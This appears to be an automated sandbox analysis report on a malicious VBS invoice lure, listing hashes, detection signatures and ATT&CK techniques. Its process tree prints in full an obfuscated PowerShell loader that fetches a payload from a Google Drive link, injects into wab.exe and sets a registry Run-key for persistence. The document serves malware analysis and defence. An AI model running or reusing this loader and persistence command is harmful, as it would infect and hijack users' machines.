Overview

overview

10

Static

static

1

Payment IN...df.vbs

windows7-x64

8

Payment IN...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    04-07-2024 15:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Payment INV-373728_pdf.vbs

  • Size

    22KB

  • MD5

    f15820905822cf3b2f11e3c34c3ea408

  • SHA1

    1d37cfb741fc1b2fa2a47c088dc9f88edf01a501

  • SHA256

    31a6818ba439d39bdae897b77513d3a92d27bc3f93b5b1a5aaf1d77ec5e49738

  • SHA512

    4fcc64060f8b747d849f926501e17512098a6736ba23b2f3de0c4073fa76ab58f0629bf828db56c025dd3ce870c033e2db18bd12028f985c5d5921c567d17358

  • SSDEEP

    384:Ixr9nWbJlZMmn6nDz1mFYAf+dTRyIK53A5NCFm7Ar+rZsezJy7SAls1/CSAZ9TkQ:IxrYbvZMmn6DhmFYAf+dTYIKtwIslPsf

Score
8/10
persistence

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment INV-373728_pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Windows\syswow64\windowsPowershell\v1.0\Powershell.exe
      "C:\Windows\syswow64\windowsPowershell\v1.0\Powershell.exe" "$Diskettestrelse='S';$Diskettestrelse+='ubs';$Diskettestrelse+='tri';$Affedtning = 1;$Diskettestrelse+='ng';Function Fuldfrer($Genfortolkedes68){$Fezzan187=$Genfortolkedes68.Length-$Affedtning;For( $Ophvelsen=4;$Ophvelsen -lt $Fezzan187;$Ophvelsen+=5){$Bidi+=$Genfortolkedes68.$Diskettestrelse.Invoke( $Ophvelsen, $Affedtning);}$Bidi;}function Seniorchefs($Coassisted){ & ($Ungarnsophold) ($Coassisted);}$Ulempetillgget=Fuldfrer 'Vgm,MSubso BugzVksti DinlF eml JvnaCo v/Maks5,rth.Kar.0 Bov Lush(,yroW Degi Pr nSammd nproM dew TitsNa.o In,bNC,elTTheo Kdbj1Haem0Avis.Folk0Deta;Non, .roW ,oui.obbn Flo6Haa 4To,b; pr. LlatxMell6Kong4Teor; ro FunirsplevScor:S.pe1Jatr2Aphr1Tank.Ungs0Hano)Prof VacuG Stre PatcUn,okFl go Dea/Traf2Fyrs0 Moi1Samb0 Wa.0Bygn1Isol0Zeno1Udse FlucFvandiFineremuleConffSagio Semx tou/Chi.1Resm2unde1Kore.Bilf0 Edd ';$syndflodssagnenes=Fuldfrer 'indoUOve.sTubeeadverToym- ,ubAUdb,gl.mbe Obsn RaktScal ';$Hexanedione202=Fuldfrer ' MeshReedtBooktRetspAfv sUtil:Resy/ De,/Pedad ,dsrSlg i BrivIncoeNon .FichgVoleoSi,io rikg ewsl remeImpo.Tr gc SkaoLi nmKahi/DeleuNa.ucPrew?Uni e DrvxWaa pRhamoforkr skytBika=Flo dMascoBeskw SelnRioslFo,boD.biaprvedCa,c& SneiSorddHexa= Def1IlluQ cri2Littf StiSUds ZTidsfMesoUhoejKMendK Har1FragDL.se8St pMAs.ex.ontwpy.aIFarvAForb7SnydWSproY Alk6DoebUSemi4PickFKr.sS ElaEd.so2Ta,tvAnn,ZProa0T.le7Gue H Uph ';$plott=Fuldfrer ' Pan>,ola ';$Ungarnsophold=Fuldfrer 'ShoeiFis e RegxFemi ';$Inoriginate55='Alluvious';$Violescent = Fuldfrer 'AgaveBewicKorrhMnnioBeho Mism%E.asaE.alp notp NondForta TratTullaUblo% Naz\DuraTOrdveHar nCritd Sh.e.ecanGenatSluti ExpsSpit.SkaaaMa.gf.ooss Nom ,and&Oply&Rea Re e Tr.c ComhModboHand ForetKnfr ';Seniorchefs (Fuldfrer 'Supe$Dua,gSvenl BevoCaprbT,ipaMatrl Her:ExtrWC.coiTederK dleAd,ap CouhB,ssomenntFairo Sma=Comm(Af,hcu exmAmuldSene Fiss/VegecEvan Si f$.kstV MaaiSattoSkydlSolfeTwi.sKo,scCogle C.mnMalatMult)Re.l ');Seniorchefs (Fuldfrer 'Vomi$ Torg .inlAsceoFavob Efta.atal Mu :FolkW,ayootreboudvel MedeSpidrHvepsBina=.iph$FadlHSl tetronx Svaa GlonBistedicadKonkiMalmoPrein Gige M.d2Repa0circ2 Dai. ,nisFri,pSik.lSkdei chetInte(Tar,$StabpconvlSup oFyretBredtVaeg)Inte ');$Hexanedione202=$Woolers[0];$Cobaltous= (Fuldfrer 'A,ag$Snakg CarlUtiloSultb,regaMyrelfib.:Sy.fUUndvdMyk.sreprtUni,iOplal,ichl FavianthnPaelgAnhosDe,tv gutiBaasnBispd PhiuBraneSoftr AfvsF.ol=V lgN,rdgeHft w Blo-CottOTokebBlegjNem,e Unoc G otKlim bsS A.ly Ru,s estt Mene,ffamu ha.YajnNRoseeBiavtMisc. .ecW SileDecebRe.uCBrealUafhimarie BarnDommt');$Cobaltous+=$Wirephoto[1];Seniorchefs ($Cobaltous);Seniorchefs (Fuldfrer ',vag$ TjeU PaddS,aisGennt BesiTemalLogel Seli,ekunErytgSmels ketv MariMorgn ebrdGrypu ,ageFiltrVibrsDi,t..onmH Tile ,aua T ldTo.oe Su rFalmsFibu[Syna$StylsUn,oyGoldnDedidSalofGerml StooSubrdTunnsRenosPolya burg TirnUntieWritnDaareB vasArcc]Sing= V r$ S,tUunprlI.dkeRettmUncopFljaeUnret gliiCopulP rhlG apgSamfg UnteNeartSels ');$Verbalizes=Fuldfrer 'Unpr$ tegUAutodKells HantPrewiUsselHermlOppuiEmdenHazegC.khs Ga.vDyreiAa nnHun dUntiuKejseFotor RadsIc.t.PennD.areoS,piwLtemn BlalSvaloKnoga,rifdDr,gF floiOniolErnreVene( Ama$SvenHFor eA.mixS ataKlinn roreSib.d inui.jeroSandnTilbeUske2 Pos0Kems2Civi,p.ra$.ennN SkraPreat esoiIsoco ,arnHeadaFjenlVelkisupes LaaeNongrSyg iMonon Nong,dreeactin Un )ro,o ';$Nationaliseringen=$Wirephoto[0];Seniorchefs (Fuldfrer ' Bes$ kolg B.tl chfoBemgbKontaUnsalunbe:caesSSt dpAutolitemeR prnStiliBo ruPh lsKi,e=Lim,( ,ioTMiraeAlbusK nttPost-TenuPBevgaOccatAnt hUng, Coll$BelmN adnahoydt beti,ilsoFlyvnDat a pilFjeniChansMoone ercrFestiEkspnSighgFurseSe.inHypn)Line ');while (!$Splenius) {Seniorchefs (Fuldfrer 'Snde$ olkg PaclDecoo RatbGui,aU.delA,te:,ries WedoChe.m Un.mTakneYngsr.hesg ViksFlottNer eT errGrnin PseeSort=Unyc$Rumfth lnr ZoouPille,oqu ') ;Seniorchefs $Verbalizes;Seniorchefs (Fuldfrer 'Cha,S Udet P,naFremrSquit Co -h,ndSYngllBroneLagre forpstrm eis4Trak ');Seniorchefs (Fuldfrer 'Mith$HavagKetolMlk.o,lnsbA.tiaSmudl Gas:,angS UnrpDeprlUnsues.mmnGlasiEkskuRidds T m=Tusi(UnadTZoroeLuscsSpedtri g- VerP LinaUdvetSrgmhReto Rhe$S,riNtvana Kast,orbiQuiroDetin Stia Pu.l SoiiUndes ArbeEcumrPerii JornCallgForeeHemlnPall)Zeug ') ;Seniorchefs (Fuldfrer 'Mate$Man.g.ydalDi hoForgbDemuamonalunvi:Sydap paan PaleBlafumicrmFlavoHundrSl grAlamhTaljaPennc,apihroy ihalisUfor=Pree$ allg Mirlwello SekbO,saa S,rlDibb:Fil L loeskvbfBalfsRatie Ny lUnsu+Cust+ B,d%Ej,n$sgemWK.raoMiscoKonglNonde I.mrwholsskaa.TaklcU,foo .ibuHespn Pa,t Ch. ') ;$Hexanedione202=$Woolers[$pneumorrhachis];}$Overdecks=341565;$Macrocephalic=28079;Seniorchefs (Fuldfrer 'Degn$CleigSupelStrkoIndibBecuaN.hjl For: FodSSe.vm K aeGavslSpect V,leBocno PansServtruineHattnMuld seu=Skvh Lv.kG A leD,gdtKeto-SmokCS kkoRevenShowtAfrieTi.rnMesttSequ Ge o$ MaaNForeaAssitNursiGuldoDr.nnCataaHyralP.teiUdv s D,veEpigr B.niOxyenCo,pgP.ste.ypenPres ');Seniorchefs (Fuldfrer 'Mon.$Irwigerhvl,earoBraubunsya.pbylKdeb:foamRWeeke,nowa,trstAfgitKlaraAmani RatnFri iBlu.nOr.kg Pra en= Cat Game[ yttSCocoy otis demtStereAngem Afg.I.htCu.inoAcrenTeolvBarneYndlrNimitIn h]Phot:Vire:Civ.FVol rZimeoFersmLeddBYdera BatsSammeOrdr6erme4MethSDd atBundr MoliVirkn OphgAuto(B gg$ eoSbrndmf rteBriklLydetOvere Kalo apgsb.llt OvaeCostnFo,s) Par ');Seniorchefs (Fuldfrer ' Vid$RedugAarslParoolatebBoksaMagnlEnst: V,dC onieP.rfn Re tOverrBo.faCos,lAfgrebloks Ba.tisol mili=Rr.g We [,befS CauyDyrts,esktOr reSprimAfsn.knebTDeckePap.xEnstt Glo.LighEAppon hiccSkrvoAlgod TiciPlenn argg ,al]Form:U.me:,rdmASimoS EskC H.aIdansISlab.kvadG edieL gntPr,eSBundtAerirtalsiSv,nnQuotgDato(Atta$Ha aRAlpietel,aUdd,t.mpltForbaProtiUdkonAf,aiB.ann SmagFjum)Adel ');Seniorchefs (Fuldfrer 'Prak$ReptgE.iklArchoVelubCavaa.quilTrin:Art TR,brrForsyVennpShahsResui Ni,nK,rooTikagVerae Filn L,u=Si.e$ HarCShireT iknF rlt De.rKrumaUnbilDataeCeresS edtEcto. TyrsH mou U.rbP,lis seltVd,nr HeniJoggnOptegSalm(Tlle$woodO stvEntae Regr ernd Anse EsscImpekIleesFri.,Mand$TredMUd va BalcSe.vr Nono Af cKi.keCh,npCarihSidea.arvlDjvli semc ri)Dyne ');Seniorchefs $Trypsinogen;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tendentis.afs && echo t"
        3⤵
          PID:2544
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Diskettestrelse='S';$Diskettestrelse+='ubs';$Diskettestrelse+='tri';$Affedtning = 1;$Diskettestrelse+='ng';Function Fuldfrer($Genfortolkedes68){$Fezzan187=$Genfortolkedes68.Length-$Affedtning;For( $Ophvelsen=4;$Ophvelsen -lt $Fezzan187;$Ophvelsen+=5){$Bidi+=$Genfortolkedes68.$Diskettestrelse.Invoke( $Ophvelsen, $Affedtning);}$Bidi;}function Seniorchefs($Coassisted){ & ($Ungarnsophold) ($Coassisted);}$Ulempetillgget=Fuldfrer 'Vgm,MSubso BugzVksti DinlF eml JvnaCo v/Maks5,rth.Kar.0 Bov Lush(,yroW Degi Pr nSammd nproM dew TitsNa.o In,bNC,elTTheo Kdbj1Haem0Avis.Folk0Deta;Non, .roW ,oui.obbn Flo6Haa 4To,b; pr. LlatxMell6Kong4Teor; ro FunirsplevScor:S.pe1Jatr2Aphr1Tank.Ungs0Hano)Prof VacuG Stre PatcUn,okFl go Dea/Traf2Fyrs0 Moi1Samb0 Wa.0Bygn1Isol0Zeno1Udse FlucFvandiFineremuleConffSagio Semx tou/Chi.1Resm2unde1Kore.Bilf0 Edd ';$syndflodssagnenes=Fuldfrer 'indoUOve.sTubeeadverToym- ,ubAUdb,gl.mbe Obsn RaktScal ';$Hexanedione202=Fuldfrer ' MeshReedtBooktRetspAfv sUtil:Resy/ De,/Pedad ,dsrSlg i BrivIncoeNon .FichgVoleoSi,io rikg ewsl remeImpo.Tr gc SkaoLi nmKahi/DeleuNa.ucPrew?Uni e DrvxWaa pRhamoforkr skytBika=Flo dMascoBeskw SelnRioslFo,boD.biaprvedCa,c& SneiSorddHexa= Def1IlluQ cri2Littf StiSUds ZTidsfMesoUhoejKMendK Har1FragDL.se8St pMAs.ex.ontwpy.aIFarvAForb7SnydWSproY Alk6DoebUSemi4PickFKr.sS ElaEd.so2Ta,tvAnn,ZProa0T.le7Gue H Uph ';$plott=Fuldfrer ' Pan>,ola ';$Ungarnsophold=Fuldfrer 'ShoeiFis e RegxFemi ';$Inoriginate55='Alluvious';$Violescent = Fuldfrer 'AgaveBewicKorrhMnnioBeho Mism%E.asaE.alp notp NondForta TratTullaUblo% Naz\DuraTOrdveHar nCritd Sh.e.ecanGenatSluti ExpsSpit.SkaaaMa.gf.ooss Nom ,and&Oply&Rea Re e Tr.c ComhModboHand ForetKnfr ';Seniorchefs (Fuldfrer 'Supe$Dua,gSvenl BevoCaprbT,ipaMatrl Her:ExtrWC.coiTederK dleAd,ap CouhB,ssomenntFairo Sma=Comm(Af,hcu exmAmuldSene Fiss/VegecEvan Si f$.kstV MaaiSattoSkydlSolfeTwi.sKo,scCogle C.mnMalatMult)Re.l ');Seniorchefs (Fuldfrer 'Vomi$ Torg .inlAsceoFavob Efta.atal Mu :FolkW,ayootreboudvel MedeSpidrHvepsBina=.iph$FadlHSl tetronx Svaa GlonBistedicadKonkiMalmoPrein Gige M.d2Repa0circ2 Dai. ,nisFri,pSik.lSkdei chetInte(Tar,$StabpconvlSup oFyretBredtVaeg)Inte ');$Hexanedione202=$Woolers[0];$Cobaltous= (Fuldfrer 'A,ag$Snakg CarlUtiloSultb,regaMyrelfib.:Sy.fUUndvdMyk.sreprtUni,iOplal,ichl FavianthnPaelgAnhosDe,tv gutiBaasnBispd PhiuBraneSoftr AfvsF.ol=V lgN,rdgeHft w Blo-CottOTokebBlegjNem,e Unoc G otKlim bsS A.ly Ru,s estt Mene,ffamu ha.YajnNRoseeBiavtMisc. .ecW SileDecebRe.uCBrealUafhimarie BarnDommt');$Cobaltous+=$Wirephoto[1];Seniorchefs ($Cobaltous);Seniorchefs (Fuldfrer ',vag$ TjeU PaddS,aisGennt BesiTemalLogel Seli,ekunErytgSmels ketv MariMorgn ebrdGrypu ,ageFiltrVibrsDi,t..onmH Tile ,aua T ldTo.oe Su rFalmsFibu[Syna$StylsUn,oyGoldnDedidSalofGerml StooSubrdTunnsRenosPolya burg TirnUntieWritnDaareB vasArcc]Sing= V r$ S,tUunprlI.dkeRettmUncopFljaeUnret gliiCopulP rhlG apgSamfg UnteNeartSels ');$Verbalizes=Fuldfrer 'Unpr$ tegUAutodKells HantPrewiUsselHermlOppuiEmdenHazegC.khs Ga.vDyreiAa nnHun dUntiuKejseFotor RadsIc.t.PennD.areoS,piwLtemn BlalSvaloKnoga,rifdDr,gF floiOniolErnreVene( Ama$SvenHFor eA.mixS ataKlinn roreSib.d inui.jeroSandnTilbeUske2 Pos0Kems2Civi,p.ra$.ennN SkraPreat esoiIsoco ,arnHeadaFjenlVelkisupes LaaeNongrSyg iMonon Nong,dreeactin Un )ro,o ';$Nationaliseringen=$Wirephoto[0];Seniorchefs (Fuldfrer ' Bes$ kolg B.tl chfoBemgbKontaUnsalunbe:caesSSt dpAutolitemeR prnStiliBo ruPh lsKi,e=Lim,( ,ioTMiraeAlbusK nttPost-TenuPBevgaOccatAnt hUng, Coll$BelmN adnahoydt beti,ilsoFlyvnDat a pilFjeniChansMoone ercrFestiEkspnSighgFurseSe.inHypn)Line ');while (!$Splenius) {Seniorchefs (Fuldfrer 'Snde$ olkg PaclDecoo RatbGui,aU.delA,te:,ries WedoChe.m Un.mTakneYngsr.hesg ViksFlottNer eT errGrnin PseeSort=Unyc$Rumfth lnr ZoouPille,oqu ') ;Seniorchefs $Verbalizes;Seniorchefs (Fuldfrer 'Cha,S Udet P,naFremrSquit Co -h,ndSYngllBroneLagre forpstrm eis4Trak ');Seniorchefs (Fuldfrer 'Mith$HavagKetolMlk.o,lnsbA.tiaSmudl Gas:,angS UnrpDeprlUnsues.mmnGlasiEkskuRidds T m=Tusi(UnadTZoroeLuscsSpedtri g- VerP LinaUdvetSrgmhReto Rhe$S,riNtvana Kast,orbiQuiroDetin Stia Pu.l SoiiUndes ArbeEcumrPerii JornCallgForeeHemlnPall)Zeug ') ;Seniorchefs (Fuldfrer 'Mate$Man.g.ydalDi hoForgbDemuamonalunvi:Sydap paan PaleBlafumicrmFlavoHundrSl grAlamhTaljaPennc,apihroy ihalisUfor=Pree$ allg Mirlwello SekbO,saa S,rlDibb:Fil L loeskvbfBalfsRatie Ny lUnsu+Cust+ B,d%Ej,n$sgemWK.raoMiscoKonglNonde I.mrwholsskaa.TaklcU,foo .ibuHespn Pa,t Ch. ') ;$Hexanedione202=$Woolers[$pneumorrhachis];}$Overdecks=341565;$Macrocephalic=28079;Seniorchefs (Fuldfrer 'Degn$CleigSupelStrkoIndibBecuaN.hjl For: FodSSe.vm K aeGavslSpect V,leBocno PansServtruineHattnMuld seu=Skvh Lv.kG A leD,gdtKeto-SmokCS kkoRevenShowtAfrieTi.rnMesttSequ Ge o$ MaaNForeaAssitNursiGuldoDr.nnCataaHyralP.teiUdv s D,veEpigr B.niOxyenCo,pgP.ste.ypenPres ');Seniorchefs (Fuldfrer 'Mon.$Irwigerhvl,earoBraubunsya.pbylKdeb:foamRWeeke,nowa,trstAfgitKlaraAmani RatnFri iBlu.nOr.kg Pra en= Cat Game[ yttSCocoy otis demtStereAngem Afg.I.htCu.inoAcrenTeolvBarneYndlrNimitIn h]Phot:Vire:Civ.FVol rZimeoFersmLeddBYdera BatsSammeOrdr6erme4MethSDd atBundr MoliVirkn OphgAuto(B gg$ eoSbrndmf rteBriklLydetOvere Kalo apgsb.llt OvaeCostnFo,s) Par ');Seniorchefs (Fuldfrer ' Vid$RedugAarslParoolatebBoksaMagnlEnst: V,dC onieP.rfn Re tOverrBo.faCos,lAfgrebloks Ba.tisol mili=Rr.g We [,befS CauyDyrts,esktOr reSprimAfsn.knebTDeckePap.xEnstt Glo.LighEAppon hiccSkrvoAlgod TiciPlenn argg ,al]Form:U.me:,rdmASimoS EskC H.aIdansISlab.kvadG edieL gntPr,eSBundtAerirtalsiSv,nnQuotgDato(Atta$Ha aRAlpietel,aUdd,t.mpltForbaProtiUdkonAf,aiB.ann SmagFjum)Adel ');Seniorchefs (Fuldfrer 'Prak$ReptgE.iklArchoVelubCavaa.quilTrin:Art TR,brrForsyVennpShahsResui Ni,nK,rooTikagVerae Filn L,u=Si.e$ HarCShireT iknF rlt De.rKrumaUnbilDataeCeresS edtEcto. TyrsH mou U.rbP,lis seltVd,nr HeniJoggnOptegSalm(Tlle$woodO stvEntae Regr ernd Anse EsscImpekIleesFri.,Mand$TredMUd va BalcSe.vr Nono Af cKi.keCh,npCarihSidea.arvlDjvli semc ri)Dyne ');Seniorchefs $Trypsinogen;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:812
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tendentis.afs && echo t"
            4⤵
              PID:1716
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2172
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthrive" /t REG_EXPAND_SZ /d "%Synsfelts% -w 1 $Bucorvinae=(Get-ItemProperty -Path 'HKCU:\Skdyrets\').Breakwater;%Synsfelts% ($Bucorvinae)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1080
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthrive" /t REG_EXPAND_SZ /d "%Synsfelts% -w 1 $Bucorvinae=(Get-ItemProperty -Path 'HKCU:\Skdyrets\').Breakwater;%Synsfelts% ($Bucorvinae)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2132

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      3
      T1112

      Subvert Trust Controls

      1
      T1553

      Install Root Certificate

      1
      T1553.004

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Web Service

      1
      T1102

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        14d96d9602bfa837757a5571199304f5

        SHA1

        51a4713441151b8f81c9d50a54ad69f44168082f

        SHA256

        096df312b52b48aaa22d8b4bd5e25e75afce5b26552a7fb2752807dc553aca9a

        SHA512

        90a87790e265af1850b8dabf6644089c65c04417b10b41b337078f0d4c83dc88171b76fb317993449fef85b564e00c5cdf62f4f659c35f137ad43338a65074b7

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        7f04eda20b78d0823eed3da6e43bcce4

        SHA1

        75dab83337440c7beffbc25ff1e482b2b02d0ae0

        SHA256

        1838d119f986117b6c97ed05d1672fb9338659b10747e8bff506fe51acdb6391

        SHA512

        d9de8aff63d496a49a072905d880c0a524d40f40d9987f631af92f7e45f4dc2d827e001df62d37f880e1e45ec19e2b3f3644efb06d6e7d7f957bbbdbc51fc60a

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        242B

        MD5

        adf7bb851b0588b187105b84fa6a95c1

        SHA1

        fba88976bc7565474af1cdae139a8ee1937a7edf

        SHA256

        8af35b51622aacc548da8bfdd5e2b1e042cbc3cff92bd9a66862fedd2b59fbae

        SHA512

        90fda7d6739039b2584d4d9b65f02a5bd68d1599d182576cc278403b0908e8597248ea6b8facbcb58feb91c742a5e2b04b06754ed7673532b0dc49e4a6dad865

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Tar1BFE.tmp
        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        1121c834670ac73f8361594b73b4c921

        SHA1

        a8a3e3326ac5bf082b20872d4d967d7e1f8cd632

        SHA256

        325a1fa11491138a244d841675fc893a41a4e3148529fc40935896b182c96670

        SHA512

        b4d4cd088c5559031920c20c26668e491856e535aec96e4a165f0dcdcd12899e95797bd7894cec1e60fab198c8e7fe5d0adeb7ac9535e0b25c150478fdd86686

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Tendentis.afs
        Filesize

        481KB

        MD5

        40e2726e856af20f6273da18979ccf81

        SHA1

        9a6fe482414dea4c5046f199d592f829d94fa12e

        SHA256

        7e4be25568094c695602683c645d736d20141d8074f0136f89dad8f97a5294e1

        SHA512

        e98cb70a769576dd512ee43c31ef09df7f4f06df3fd94ff7c502f5b30d38d70ce948557a12fa9e61b73f898e3af48ac5d4f8d4d808affe9605c16880ab873fdd

        Download Submit
      • memory/812-74-0x0000000006640000-0x000000000BBA0000-memory.dmp
        Filesize

        85.4MB

        Download
      • memory/2172-77-0x0000000000300000-0x0000000001362000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/2928-40-0x0000000074650000-0x0000000074BFB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2928-42-0x0000000074650000-0x0000000074BFB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2928-73-0x0000000074650000-0x0000000074BFB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2928-41-0x0000000074650000-0x0000000074BFB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2928-39-0x0000000074650000-0x0000000074BFB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2928-38-0x0000000074651000-0x0000000074652000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2928-101-0x0000000074650000-0x0000000074BFB000-memory.dmp
        Filesize

        5.7MB

        Download